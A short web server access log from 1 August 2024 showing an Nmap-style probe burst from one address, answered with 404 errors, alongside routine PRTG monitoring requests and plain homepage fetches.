208.100.26.230 - - [01/Aug/2024:09:10:41 +0200] "POST /sdk HTTP/1.1" 404 308 "-" "Mozilla/5.0 (Linux; Android 8.0.0; SM-J810G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.136 Mobile Safari/537.36"
208.100.26.230 - - [01/Aug/2024:09:10:41 +0200] "GET /nmaplowercheck1722495791 HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Linux; Android 8.0.0; SM-J810G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.136 Mobile Safari/537.36"
208.100.26.230 - - [01/Aug/2024:09:10:41 +0200] "GET /evox/about HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Linux; Android 8.0.0; SM-J810G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.136 Mobile Safari/537.36"
208.100.26.230 - - [01/Aug/2024:09:10:43 +0200] "GET /HNAP1 HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Linux; Android 8.0.0; SM-J810G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.136 Mobile Safari/537.36"
208.100.26.230 - - [01/Aug/2024:09:10:43 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
208.100.26.230 - - [01/Aug/2024:09:10:43 +0200] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; Android 8.0.0; SM-J810G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.136 Mobile Safari/537.36"
208.100.26.230 - - [01/Aug/2024:09:10:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Aug/2024:09:10:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [01/Aug/2024:09:11:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Aug/2024:09:11:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:09:12:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [01/Aug/2024:09:12:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Aug/2024:09:13:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [01/Aug/2024:09:14:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Aug/2024:09:14:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:09:15:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:09:16:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:09:17:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [01/Aug/2024:09:18:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Aug/2024:09:18:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
